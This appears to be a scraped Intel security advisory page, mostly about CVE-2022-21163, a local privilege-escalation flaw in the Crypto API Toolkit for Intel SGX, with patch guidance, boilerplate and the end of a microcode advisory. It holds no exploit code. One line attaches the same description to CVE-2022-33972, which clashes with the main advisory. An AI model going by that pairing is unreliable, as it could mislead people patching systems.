GitHub\*: Public Github: https://github.com/intel/Intel-Linux-Processor-Microcode-Data-Files

Details on the microcode loading points can be found at:

https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/secure-coding/loading-microcode-os.html

This CVE requires a Microcode Security Version Number (SVN) update. To address this vulnerability, a SGX TCB recovery is planned, refer here for more information on the SGX TCB recovery process.  

**Acknowledgements:**

Intel would like to thank Microsoft for reporting this issue.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

02/14/2023

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-33972: INTEL-SA-00730

Improper access control in the Crypto API Toolkit for Intel(R) SGX before version 2.0 commit ID 91ee496 may allow an authenticated user to potentially enable escalation of privilege via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Crypto API Toolkit for Intel® SGX Advisory**

**Summary: **

A potential security vulnerability in the Crypto API Toolkit for Intel® SGX (Software Guard Extensions) may allow escalation of privilege.  Intel is releasing toolkit updates to mitigate these potential vulnerabilities.  
 

**Vulnerability Details:**

CVEID: CVE-2022-21163

Description: Improper access control in the Crypto API Toolkit for Intel(R) SGX before version 2.0 commit ID 91ee496 may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 8.4 High

**Affected Products:**

Crypto API Toolkit for Intel® SGX before version 2.0 commit ID 91ee496.  
 

**Recommendations:**

Intel recommends updating Crypto API Toolkit for Intel® SGX to version 2.0 commit ID 91ee496 or later.

Updates are available for download at this location:

https://github.com/intel/crypto-api-toolkit  
 

**Acknowledgements:**

Intel would like to thank Sankaranarayanan Venkatasubramanian for reporting this issue.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

02/14/2023

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

Tag

#intel